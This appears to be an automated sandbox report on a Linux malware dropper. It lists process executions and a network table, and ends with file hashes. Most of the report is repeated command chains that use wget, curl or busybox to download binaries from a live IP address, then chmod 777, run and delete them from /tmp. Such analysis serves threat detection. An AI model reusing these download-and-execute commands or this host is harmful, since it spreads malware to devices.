/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97